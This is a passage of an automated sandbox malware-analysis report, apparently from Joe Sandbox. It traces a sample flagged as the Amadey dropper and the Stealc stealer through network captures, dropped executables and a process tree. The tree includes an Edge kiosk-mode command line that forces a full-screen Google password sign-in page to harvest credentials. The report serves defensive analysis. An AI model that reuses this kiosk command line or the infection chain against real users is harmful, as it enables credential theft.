2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 5c 22 3a 20 5b 36 32 31 39 2c 20 32 33 36 37 2c 20 36 33 31 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 65 65 64 61 69 6c 65 65 6e 62 6f 69 6c 65 72 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 31 31 33 34 2c 20 31 39 31 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6a 70 67 61 74 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 39 39 33 34 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6d 2e 62 65 72 72 79 73 2e 75 6b 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 5d 7d 22 2c 0d 0a 20 20 20 20 22 63 72 6d 2e 66 6f 6f 64 61 6c 65 72 74 2e 63 6f 6d 22 Data Ascii: \": [6219, 2367, 6318]}", "creedaileenboiler.com": "{\"Tier1\": [6061], \"Tier2\": [1134, 1912]}", "crjpgate.com": "{\"Tier1\": [6061], \"Tier2\": [9934]}", "crm.berrys.uk.com": "{\"Tier1\": [8405], \"Tier2\": []}", "crm.foodalert.com"
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 31 35 32 2c 20 32 33 36 2c 20 34 39 31 35 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 65 61 72 6e 2e 72 75 6e 73 68 61 77 2e 61 63 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 36 30 36 31 2c 20 38 38 34 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 38 31 32 2c 20 31 32 34 30 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 65 61 72 6e 69 6e 67 2e 6e 6f 6f 64 6c 65 6e 6f 77 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 32 39 38 2c 20 31 32 34 30 2c 20 37 32 39 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 65 6c 70 2e 6e 6f 72 74 68 75 6d 62 72 69 61 2e 61 63 2e 75 6b 22 3a 20 22 7b 5c Data Ascii: 6061], \"Tier2\": [6152, 236, 4915]}", "elearn.runshaw.ac.uk": "{\"Tier1\": [7670, 6061, 8845], \"Tier2\": [8812, 1240]}", "elearning.noodlenow.co.uk": "{\"Tier1\": [7670, 6061], \"Tier2\": [4298, 1240, 7293]}", "elp.northumbria.ac.uk": "{\
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 2c 0d 0a 20 20 20 20 22 67 61 64 67 65 74 73 62 6f 6f 6d 2e 6e 65 74 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 35 37 35 2c 20 33 39 35 32 5d 7d 22 2c 0d 0a 20 20 20 20 22 67 61 6c 6c 65 72 69 65 73 2e 70 61 72 65 6e 74 73 64 6f 6d 65 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 38 36 5d 7d 22 2c 0d 0a 20 20 20 20 22 67 61 6d 65 2e 67 72 61 6e 62 6c 75 65 66 61 6e 74 61 73 79 2e 6a 70 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 37 34 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 32 35 36 2c 20 36 39 31 36 2c 20 37 32 31 39 2c 20 31 30 30 30 32 2c 20 37 31 33 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 Data Ascii: , "gadgetsboom.net": "{\"Tier1\": [6061, 8405], \"Tier2\": [8575, 3952]}", "galleries.parentsdome.com": "{\"Tier1\": [], \"Tier2\": [786]}", "game.granbluefantasy.jp": "{\"Tier1\": [8741], \"Tier2\": [256, 6916, 7219, 10002, 7133]}", "
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 39 36 30 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 63 74 70 6f 72 74 61 6c 2e 63 79 6d 72 75 2e 6e 68 73 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 31 34 38 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 64 2e 61 74 6c 61 73 73 69 61 6e 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 35 31 33 36 2c 20 31 34 36 36 2c 20 32 33 36 2c 20 38 36 32 33 2c 20 34 34 32 36 2c 20 32 32 33 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 69 64 2e 61 75 74 6f 65 6e 72 6f 6c 6d 65 6e 74 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 Data Ascii: : "{\"Tier1\": [7670], \"Tier2\": [960]}", "ictportal.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": []}", "id.atlassian.com": "{\"Tier1\": [6061, 5938], \"Tier2\": [5136, 1466, 236, 8623, 4426, 2237]}", "id.autoenrolment.co.uk": "{\"T
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 36 31 2c 20 39 38 33 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 37 38 33 38 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 65 64 73 2e 63 64 70 73 6f 66 74 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 34 35 36 38 2c 20 35 39 32 2c 20 31 31 32 39 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 74 75 73 6b 6e 6f 77 2e 66 6f 63 75 73 76 69 73 69 6f 6e 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 36 31 30 31 2c 20 36 35 34 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 6c 65 78 2e 32 62 65 64 66 6f 72 64 72 6f 77 2e 63 6f 2e 75 6b 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 33 39 37 39 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a Data Ascii: 61, 983], \"Tier2\": [7838]}", "leeds.cdpsoft.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [4568, 592, 1129]}", "letusknow.focusvision.com": "{\"Tier1\": [], \"Tier2\": [6101, 6547]}", "lex.2bedfordrow.co.uk": "{\"Tier1\": [3979], \"Tier2\":
2024-09-01 04:31:21 UTC	16384	IN	Data Raw: 6d 73 2e 6e 65 74 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 37 36 37 30 2c 20 35 39 33 38 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 38 39 39 38 2c 20 37 35 38 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 2e 73 75 6d 75 70 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 36 30 36 31 2c 20 38 34 30 35 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 33 32 37 31 2c 20 33 33 38 37 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 64 2e 65 74 6f 72 6f 2e 63 6f 6d 22 3a 20 22 7b 5c 22 54 69 65 72 31 5c 22 3a 20 5b 38 34 30 35 2c 20 36 30 36 31 5d 2c 20 5c 22 54 69 65 72 32 5c 22 3a 20 5b 33 39 32 37 2c 20 38 39 34 33 2c 20 37 39 39 2c 20 36 32 31 39 2c 20 32 38 36 33 5d 7d 22 2c 0d 0a 20 20 20 20 22 6d 65 64 61 6c 2e 74 76 22 3a 20 22 7b 5c 22 54 69 65 Data Ascii: ms.net": "{\"Tier1\": [7670, 5938], \"Tier2\": [8998, 7583]}", "me.sumup.com": "{\"Tier1\": [6061, 8405], \"Tier2\": [3271, 3387]}", "med.etoro.com": "{\"Tier1\": [8405, 6061], \"Tier2\": [3927, 8943, 799, 6219, 2863]}", "medal.tv": "{\"Tie

Target ID:	0
Start time:	00:27:50
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa30000
File size:	1'897'472 bytes
MD5 hash:	573679635B5F2712201843AB58C3C313
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2030799829.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1990276084.0000000005200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:27:52
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x130000
File size:	1'897'472 bytes
MD5 hash:	573679635B5F2712201843AB58C3C313
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2047827311.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2007572874.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:27:52
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x130000
File size:	1'897'472 bytes
MD5 hash:	573679635B5F2712201843AB58C3C313
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2009107509.0000000004900000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2049238271.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:28:00
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x130000
File size:	1'897'472 bytes
MD5 hash:	573679635B5F2712201843AB58C3C313
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.2087027193.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:28:05
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe"
Imagebase:	0xc90000
File size:	1'771'008 bytes
MD5 hash:	3D7BB337FEC6E0587CB2AC31BBD4780A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:28:07
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe"
Imagebase:	0xa80000
File size:	1'771'008 bytes
MD5 hash:	3D7BB337FEC6E0587CB2AC31BBD4780A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:28:11
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe"
Imagebase:	0x7d0000
File size:	917'504 bytes
MD5 hash:	769C5CA33FE0D7003A0C686CDCFB9021
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:28:11
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:28:12
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2092,i,10167336133317156012,1155906441156818278,262144 --disable-features=TranslateUI /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:28:12
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:28:12
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	00:28:16
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7172 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:28:16
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7216 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:28:30
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:28:30
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:28:31
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=2128 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:28:38
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:28:39
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:28:39
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3576 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:31:13
Start date:	01/09/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3244 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 0542068B Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f1fcea835bbccb89d433797c909645b0bb156d38c5f0a7219549372398cd46
Instruction ID: 101a7f0e980a46a9a62dd157adc662f266168f7b0a3f24caaed2a5dfaf97f3d0
Opcode Fuzzy Hash: e7f1fcea835bbccb89d433797c909645b0bb156d38c5f0a7219549372398cd46
Instruction Fuzzy Hash: F6115BEF04C030FEA141D5524A8C6FABAEFB5D27307B08127F44FC7A02D1A40A575572

Function 0542069D Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11a2fb48d448e5f222ba872bc5ad9a56e07c4c315cd11ac8039611ebd1d5751
Instruction ID: 65e4cc72bcff899b4ebeff40e8af03f2c0c7d23191e9c19165d07482c48328fe
Opcode Fuzzy Hash: d11a2fb48d448e5f222ba872bc5ad9a56e07c4c315cd11ac8039611ebd1d5751
Instruction Fuzzy Hash: 1C21879B04D130EEE102A6620E9C2FA7AEBB5D27307B08227F44FC7A02D1950A979572

Function 05420752 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794e8cda59ff4947f47d17cae13418fccf3d1d3f434ec8f52c01b3c880bf99a4
Instruction ID: 165149d3470fb1bfdec77c880be7648ddf796d538f719b2e8758ae45718084cb
Opcode Fuzzy Hash: 794e8cda59ff4947f47d17cae13418fccf3d1d3f434ec8f52c01b3c880bf99a4
Instruction Fuzzy Hash: 9D1178EB04D130BFA101D9229A8C9FBBBEFF5D27307B0852BF84F86902D1654A479871

Function 054206FD Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3441041b5e54fa673fb26e7ad8df424898bcd7db917d512b7b5531bf2238574
Instruction ID: 60954f410cd6353a1385deb56d4e9d9a631c94e989c89906c047e943cfed0677
Opcode Fuzzy Hash: f3441041b5e54fa673fb26e7ad8df424898bcd7db917d512b7b5531bf2238574
Instruction Fuzzy Hash: 18110AAB00E030FFE14192219E5CAFBBBEFA6D17307B04527F44FC3982D6650A569572

Function 054206E4 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5396fc375196a56a3cf98a94745419d6496d4940523c75ff12b72b2f7029edc
Instruction ID: 927973d9a4532a542d111d17a6da9863ffbfe795308ba9b96777f68b249e2012
Opcode Fuzzy Hash: b5396fc375196a56a3cf98a94745419d6496d4940523c75ff12b72b2f7029edc
Instruction Fuzzy Hash: E61132EB04D030BEA14196515A8C9FABBEBF5E2B303B08627F44F82A02D1690A575831

Function 054206C7 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd7c86b29ec95cc8436659f2c7b62703dc52567e2a6472266a886ad02940336
Instruction ID: 75cb69bdf849e0f1300ea21d0efcd8700d6f1c855b900a9c2efa9524c71d6fe0
Opcode Fuzzy Hash: acd7c86b29ec95cc8436659f2c7b62703dc52567e2a6472266a886ad02940336
Instruction Fuzzy Hash: 3E1125AF00C030FFA14196525A8C6FABBEBB6D27307B08127F44FD6A02D1A50A975972

Function 054206D7 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485527c8344e0845dd2e373b15bfd697d073c37006ec2857a4816439459ce769
Instruction ID: 827a875befc0b0ba51193c8608dd6bf62816cf215da7f34b07d57823510a8646
Opcode Fuzzy Hash: 485527c8344e0845dd2e373b15bfd697d073c37006ec2857a4816439459ce769
Instruction Fuzzy Hash: C00108AB00D030FEA14195515E8C6FABBEBB5D27307B08527F44FC6902D1654A579971

Function 05420717 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032434801.0000000005420000.00000040.00001000.00020000.00000000.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5420000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a60f31faabce4c919f8e8dd495fc6dc85ba572286ba104227b78cf2fff8bc44
Instruction ID: d87fda646592059b5fbb8ec1244b302d78b14a5e1b9f5fd1776fa3aaf22f4c37
Opcode Fuzzy Hash: 1a60f31faabce4c919f8e8dd495fc6dc85ba572286ba104227b78cf2fff8bc44
